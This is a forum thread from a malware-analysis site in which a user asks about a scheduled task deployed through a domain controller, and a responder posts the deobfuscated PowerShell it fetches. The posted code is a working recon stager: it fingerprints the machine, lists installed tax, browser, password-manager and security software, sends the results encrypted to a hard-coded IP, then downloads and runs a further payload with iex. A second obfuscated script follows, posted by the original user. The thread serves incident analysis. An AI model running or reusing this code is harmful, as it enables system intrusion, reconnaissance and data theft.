A forum for reverse engineering, OS internals and malware analysis 

Ask your beginner questions here.
 #31196  by 4everyone
 Sun Jan 14, 2018 7:46 am
Happy New Year Folks !

I'm going through a situation where a Scheduled task is getting deployed through the Domain Controller to the workstation. And Task is running a wscript+powershell using a download link which is displayed in the scheduled task script.

Link is - http://192.96.206.191:9097/static/ka7ds ... AHSGA656gh

The above link has some coding. Not sure what its capable of or what actually this script does. Can someone let me know whats the purpose of the above script ? Appreciate your help in advance.

Thanks
4Everyone
 #31204  by N3mes1s
 Mon Jan 15, 2018 5:18 pm
Hello.
This is pretty interesting, seems to be a recon script(i dunno know if it's a know one and don't have time to check) in powershell. After multiple layer obfuscated with Invoke-Obfuscation and various download from the same ip, this is the code.

It is self explanatory at this stage just read the functions name :)
Code: Select all
function GsdsetWweter {
    $Serv = $args[0]
    $SK = $args[1]
    $USAG = $args[2]
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
    $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
    $ErrorActionPreference = "SilentlyContinue";
    $e=[System.Text.Encoding]::ASCII;
    function Get-SysID($HashName = "MD5"){
        [string]$ret = ""
        $hd = gwmi win32_bios
        $ret = $hd["SerialNumber"].ToString()
        [string]$String = $([Environment]::UserName +[Environment]::MachineName + $ret).ToLower();
        $StringBuilder = New-Object System.Text.StringBuilder 
        [System.Security.Cryptography.HashAlgorithm]::Create($HashName).ComputeHash([System.Text.Encoding]::UTF8.GetBytes($String))|%{ 
            [Void]$StringBuilder.Append($_.ToString("x2")) 
            } 
            $e = $StringBuilder.ToString().ToLower()
            $e
        }
  Function HasGet-Bretring($ht) { 
  $first = $true
  foreach($pair in $ht.GetEnumerator()) { 
    if ($first) 
    {
       $first = $false
    } 
    else 
    {
       $output += ';'
    }
    $output+="{0}" -f $($pair.Value)
   } 
   $output
  }

 function Get-workconfig {
  Get-WmiObject Win32_NetworkAdapter -Filter 'NetConnectionStatus=2' |
    ForEach-Object {
      $result = 1 | Select-Object Name, IP, MAC, ID
      $result.Name = $_.Name
      $result.MAC = $_.MacAddress
      $result.ID = $_.DeviceID
      $config = $_.GetRelated('Win32_NetworkAdapterConfiguration') 
      $result.IP = $config | Select-Object -expand IPAddress
      $result
    }
 
}
   
    function Get-Sysinfo {     
        $str = [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; 
        $string = ""
        foreach($c in Get-workconfig){
            [string]$lanname = $c.Name; [string]$macadr = $c.MAC; [string]$ID = $c.ID
            $ip = @{$true=$c.IP[0];$false=$p.IP}[$c.IP.Length -lt 6];
            [string]$ip = $c.IP[0]; if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
            $lanconf = @{
            id = $ID 
            ip = $ip;
            mac =  $macadr; 
            name = $lanname;
            }
           $string += HasGet-Bretring $lanconf 
           $string += "!"
        }

        $o = (Get-WmiObject Win32_OperatingSystem)        
        $str += "|$string";
        $str += '|' +$o.Name.split('|')[0];
        if(([Environment]::UserName).ToLower() -eq "system"){
            $str += '|True'
        }
        else{
            $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
        }
        [void] [Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
        $Screens = [system.windows.forms.screen]::AllScreens
        foreach ($Screen in $Screens) {                       
            $Width  = $Screen.Bounds.Width            
            $Height  = $Screen.Bounds.Height 
        }
        $str += '|' + "$Width`x$Height"
        $n = [System.Diagnostics.Process]::GetCurrentProcess()
        $str += '|'+$n.ProcessName+'|'+$n.Id
        $str += '|' + $PSVersionTable.PSVersion.Major
        $str += '|' + $ENV:PROCESSOR_ARCHITECTURE
        $str += '|' + (gwmi win32_timeZone -ComputerName $env:ComputerName).caption 
        $str += '|' + $o.ConvertToDateTime($o.LastBootUpTime)
        $str
    }
    
function getlisturi{
    $RandName = -join("abcdefghijklmoprstvuxyz".ToCharArray()|Get-Random -Count $args[0]);$ar = @('php','jsp','asp') | Get-Random;
    $RandName + '.' + $ar
    }

    function Get-Soft {
    param (
        [Parameter(ValueFromPipeline=$true)]
        [string[]]$ComputerName = $env:COMPUTERNAME,
        [string]$NameRegex = '(Opera|Firefox|Chrome|TAX|Lacerte|OLT|ProSeries|Ultratax|Drake|Taxslayer|ProTaxPro|Taxwise|Avast|ESET|Malwarebytes|McAfee|Norton|Panda|Sophos|Webroot|Bitdefender|Symantec|Trust|EICAR|Virus|Firewall|Defender|Secury|Anti|Comodo|Kasper|quickbooks|keypass|ftp|ssh|Outlook)'
    )
    foreach ($comp in $ComputerName) {
        $keys = '','\Wow6432Node'
        foreach ($key in $keys) {
            try {
                $apps = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall").GetSubKeyNames()
            } catch {
                continue
            }
            foreach ($app in $apps) {
                $program = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine',$comp).OpenSubKey("SOFTWARE$key\Microsoft\Windows\CurrentVersion\Uninstall\$app")
                $name = $program.GetValue('DisplayName')
                $str = ''
                if ($name -and $name -match $NameRegex) {
                    $str += $name + ';'
                    $str
                }
            }
        }
    }
}
            try {
                $FirstAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;         }
            catch {
                $FirstAES=New-Object System.Security.Cryptography.RijndaelManaged;
            }
    $FirstIV = [byte] 0..255 | Get-Random -count 16;$FirstAES.Mode="CBC";
    $FirstAES.Key=$e.GetBytes($SK);
    $FirstAES.IV = $FirstIV;
    $csp = New-Object System.Security.Cryptography.CspParameters;
    $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
    $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
    $rk=$rs.ToXmlString($False);$ib=$e.getbytes($rk);
    $eb=$FirstIV+$FirstAES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length); 
    $BotIDXor= Get-SysID;
    $EncodedText =[Convert]::ToBase64String($e.getbytes($BotIDXor));
    $EncodedText2 =[Convert]::ToBase64String($e.getbytes($EncodedText));
  if(-not $wc){
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
        $wc=new-object system.net.WebClient;
        $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
        $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
    }
    $wc.Headers.Add("User-Agent",$USAG);
    $wc.Headers.Add("Cookie","SESSIONID:$EncodedText2");
    $raw=$wc.UploadData($Serv + "/" + $(getlisturi 9),"POST",$eb);
    write-host "STAGER GET raw   "  $raw
    $de=$e.GetString($rs.decrypt($raw,$false));
    $key=$de[0..($de.length-2)] -join '';
    $k=$de[$de.length-1] -join '';
  if ($k -eq 0) {
    $str1 =  Get-Sysinfo;
    $str2 =  Get-Soft;
    $str = $str1 + '|' + $str2
    }
  else{$str = 'OK'+ '|' + ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") + '|' + ([System.Diagnostics.Process]::GetCurrentProcess()).id}
    $SecondAES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
    $SecondIV = [byte] 0..255 | Get-Random -count 16;
    $SecondAES.Mode="CBC"; $SecondAES.Key=$e.GetBytes($key); $SecondAES.IV = $SecondIV; 
    $ib2=$e.getbytes($str);
    $eb2=$SecondIV+$SecondAES.CreateEncryptor().TransformFinalBlock($ib2,0,$ib2.Length);
    $wc.Headers.Add("User-Agent",$USAG);
    $raw=$wc.UploadData($Serv+ "/" + $(getlisturi 13),"POST",$eb2);
try {$AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;}
catch {$AES=New-Object System.Security.Cryptography.RijndaelManaged;}
    $AES.Mode="CBC";
    $IV = $raw[0..15];$AES.Key=$e.GetBytes($key);$AES.IV = $IV;
    $shelles = [System.Text.Encoding]::ASCII.GetString($($AES.CreateDecryptor().TransformFinalBlock($raw[16..$raw.Length],0,$raw.Length-16)))
    iex $shelles
    $FirstAES=$null;$BotIDXor=$null;$rs=$null;$eb2=$null;$raw=$null;$IV=$null;$str=$null;$ib2=$null;$SecondAES=$null;$AES=$null; $SecondIV=$null;$shelles= $null;
    $Error.Clear()
    [GC]::Collect()
    [GC]::WaitForPendingFinalizers()
    federerfegegfeg $key "SESSIONID:$EncodedText2" $Serv '/sale/getinfo.php,/getnews.asp,/update/news.html,/defender/main.jsp,/mains.asp|Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0' $([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") $PSVersionTable.PSVersion.Major
    }
  GsdsetWweter 'https://192.96.206.191' ':nP&2[Ia+4E7)V~z.M5pvdrsXle$]!U(' 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Edge/12.0'
https://ghostbin.com/paste/83av7
 #31212  by 4everyone
 Fri Jan 19, 2018 6:04 pm
Hi N3mes1s,

I found another Obfuscated code running through the GP. can you please decode this for me , so that i will be able to get what it does ?
Code: Select all
. ( $VERbosePREFeREnCe.tosTrINg()[1,3]+'X'-JOiN'') ( ( '146P165h156z143}164<151z157b156;40j107P145}164}55<116;145<167<55<120b162h157L143z173g15}12b160L141b162g141g155P40P50P133L163g164;162h151z156z147;135g44}144j141;164g141P51j15b12b44P120j157P167z145<162g163<150b145g154<154j105<170;145}40g75}40}47}160z157<167b145h162}163P150g145;154j154g56<145}170P145<47L73<40g15b12z164;162h171<40P173;44<160b163}151L40L75z40z116;145<167j55h117j142j152P145L143L164}40b123<171b163z164;145}155h56<104z151b141L147L156j157h163j164h151b143L163z56}120L162z157}143P145j163;163j123z164g141<162b164;111}156P146}157<73;44h160}162z157j143j75;156z145;167;55h157g142<152z145L143<164<40b123}171<163h164;145g155j56P104P151P141j147}156P157;163L164g151P143<163z56}120g162g157}143j145<163b163P73<44h160j163b151h56L103j162j145z141;164h145}116}157g127<151;156L144h157j167<40<75}40;44;164P162b165;145L73}44;160;163g151h56;127h151h156;144z157g167}123j164P171}154z145g40L75b40g47P110}151P144L144L145;156b47z73<44<160P162z157j143g56<123L164;141;162;164z111j156j146;157}40P75g40j44P160z163;151j73b44h160P162P157L143P56;123b164P141}162}164;111<156<146}157L56b106b151j154;145<116j141g155<145z40g75g40L44j120}157b167L145P162;163z150<145b154P154h105b170b145b73h44g160j162}157g143h56h123<164j141j162h164j111h156P146b157}56j101z162b147g165;155}145}156h164<163}40;75P40z47;55;156b157h145P170L151j164g40<47<40}40j40}53z40j47}55b156j157L154<157h147j157<40h47h53j47j55L156L157b160j162j157;146}151z154z145P40P47;53z47z55z116g157;156h111b156b164P145;162}141;143h164<151;166}145g40}47;53P40<47j55<105b156<143L157P144h145L144h103b157j155<155L141g156L144<40L47z53h40g44g144;141j164g141g73j44h160;162b157}143b56g163b164g141P162h164<50g51b174b40<117g165j164g55L116h165<154h154g40P73;175}15g12z143z141z164g143h150g40j173b40}44}137j56j105<170b143b145P160;164j151;157<156j56b115;145j163g163g141;147;145z73P175P15b12L146L151b156h141L154j154z171<173j44<144}141h164h141<40g75g40h44j156P165}154z154P73b133P107P103<135z72<72b103<157<154}154}145b143g164h50L51b73<133L107j103;135z72b72b127;141}151L164<106z157b162j120b145L156h144;151g156L147h106<151g156;141j154j151b172j145b162g163h50;51;73}175P175<15;12P107;145b164j55L116j145g167b55P120<162b157h143b40<55}144<141z164L141h40b47h141h121z102z154P101j110h147L101b111;101j101<153b101P103P147g101<127z167j102j123<101b107b125<101<122j147h102j144h101L103z64L101j121<121L102<124<101g106b115z101b132}121L102b164;101h107h111b101;124<101b102b65}101h103;64b101<122;167}102h154<101j106b121g101P126b101b102;132g101P106g101b101g122L121g101}157P101<103z143z101b125;167b102j65<101z110h115b101;144;101}102j154g101P107j60h101j114g147b102;116g101b107}105z101j142}147<102P150j101}107b143h101z132z121}102g164L101}107;125j101j142b147P102P60<101;103}64<101g121;121h102j61}101j110b121L101g142z167L102}164P101z107h105}101b144z101}102g160h101<107j70j101;142z147L101j165L101j105P105b101g142<121h102}172g101b107b153h101z126P121b102}60}101<107}153<101h142z101b102b172b101;103<143P101z113<121b102P70L101b104z70j101<145P167L101<153j101L106P70;101j146L121P102b70<101j103<125j101P145g167L101L153j101j106P70<101g114g147L102h110}101}105P125;101}144}101<102g107j101;107}153h101b132<121j102L163P101g105L121L101<113j101j101L156L101g107L105g101b142z121P102L172j101b107L153j101h123g121<102b165<101j107<153h101h144<101z102;107h101j107<105L101<141b121L102<163g101;107}125;101}132z101P101b156z101P103;167<101}112<167P102L117b101<107z70;101;142P147L102}121P101z110b125L101L131<147j102;163P101b107h153b101b131b167L101P163<101z106L115L101;144g101;102j150b101j110j121z101h141g121P102b152}101}103g143b101b113h121L101}165<101<106<115}101<122<121L102}125<101;106;131z101z121h121P102b115;101h106P125b101z122P121;101L157}101P103h121;101j124h147j102;126P101h105g167g101}142<101b101g163P101<103}121;101j126}101L102z123;101}110;125h101b122b121L101;160b101;110z60h101h117z167b102<142g101P106z115g101P145g121<102g172h101L110<121P101j132h121;102P164b101g103b64P101}124P147L102L154<101}110L121}101j114<147b102<124z101g107;125P101L143g147z102;62<101j107}153L101<131P167j102b154h101z106b101;101z142b167g102z160j101b107b64;101P144z101b102z116b101L107;105b101L142<147z102j150b101P107P143<101;132h121b102P171<101g106<60}101j117P147}101h66L101}106;115L101L132b121P102P171g101P110z131b101z132j121L102}171}101z105h115P101b132z121z102;171P101h110<121z101b141L121h102P155;101h107j153b101z131;167z102b150g101h110;121b101;132z121L102;127g101L107;105}101g142j101g102z160<101g107b121L101L131P121L102j60j101;107z153b101h142g167;102P165j101;105j115<101b131L121<102<163h101j107}167g101b131j147b102z150}101L107j115P101L141P167b101}71j101P110g163b101L112<101b102}60L101}110z111;101}144;121}102<154h101L110P60h101h117b167z102j142;101z106;115;101;145b121b102L172z101L106}121h101j122L121g102P164<101;103<64h101;124;147;102L154;101z110L121P101z114z147}102g124;101<107P125h101L125L147h102<62<101P105P153g101;121j167h102;154}101j106}101g101;142g167;102}112h101z107P64b101<144}101z102z116}101}105}105h101}142h147L102z150g101}105<143h101z122j121j102h171P101j106j60P101b117h147h101;66P101}105<125P101g145z101L102j167;101}107b125}101g131}167L102<60j101}104}105<101h115j101g101g167z101z105h115z101}142z167z102;165h101g106h121}101}123j121j102z117b101b110g125P101j122z121P101<71<101j104<101j101b117;167b101P147}101<103g147}101P124j147<102h154;101}110;143g101L114h121h102z120L101<107}111h101g141L147j102z154}101b107L115<101j144z101g101;147}101j106P115b101z145L121z102L172b101g110<121<101P132g121}102}164P101b103<64j101L124;147z102;154z101j110;121}101L114}147z102;130g101L107P125;101}131g147P102;104L101L107;167h101b141}121b102g154;101b107P64L101}144L101b101L160b101j103j64}101}122;101h102z166}101<110b143h101}124<147b102j115<101<105L70}101P131;121z102P153j101}106<115<101L144P101j102;123z101P105z153L101h124;147g102z110b101h103h147L101z112g167z102;157b101j110b121j101g144L101L102L167L101L110L115b101g117L147h101z166L101z103z70b101;115<121h101}65P101j104z111}101}114}147h101z65g101L104z131}101b114g147<101b171;101z104}101j101h116j147h101P165z101z104z105}101z117j121P101j170z101;103P70P101<112g167;101g162;101z103;101}101z112}101L101b157P101<103b60P101P141L147g102}166z101L107;153h101;142g147g101g157P101;103}143z101b121}121j102L103;101;105j115P101}122h101P102b106L101L105h131b101P122h167g102g111j101b105j163}101g124P101P102j116P101b105b64<101z142<147L102<166g101P110;101h101j143;121b102j171g101b110}115h101h144L101g102<62}101;110h125P101j144b167z102<64g101b110P153z101j145b147<101j156z101;103g64g101<126P101<102}166j101;105b115g101g141P101g102b150j101z110P111b101<121;121}102L171;101L110P111;101j131h121z102j65<101h103z147j101P113;121h102<70g101b105g143h101h132z121h102<60P101z103j60}101z125g147g102P150j101z107h64L101g132z101g102L166b101P107P60L101L111j101;101}164g101;105;115L101<142;167h102z61z101}107;64;101}144b101;101<147g101z104z147P101j113;121h101}160L101}103<163;101;112g167h101L165P101L103}143}101j113b167b101j147g101<103<121j101z113;101h102g101z101;103g147<101P112h167b102b167L101;107;147j101}143h101L101<156j101P103g167b101g112<167<102<161b101P110P115j101h143L101g101L156P101<103<167L101}112j167L102L150P101L110h115z101;143z101<101z156}101L103b153h101;111j101z102}70P101;103<101P101b122j167b102<154g101g110<121b101j114h121}102;123P101g107L105;101g142L147<102<153<101j107P70}101P142g121z101h160z101;103g153P101}113g121g101z75<47<15g12L163}164P141z162L164<55L163}154h145b145b160<40;55g163h40P65}15}12g145j170P151b164'-SPLiT ';'-SplIt'}' -sPlit'z' -Split 'b'-SPLiT 'P' -SPlit 'j'-SpliT '<' -sPLiT'L' -SpLiT'g' -SPlIT 'h'|FoREaCH{ ( [ConVERt]::tOINT16(( [STrInG]$_ ) ,8 ) -aS [CHar])} ) -jOiN'' )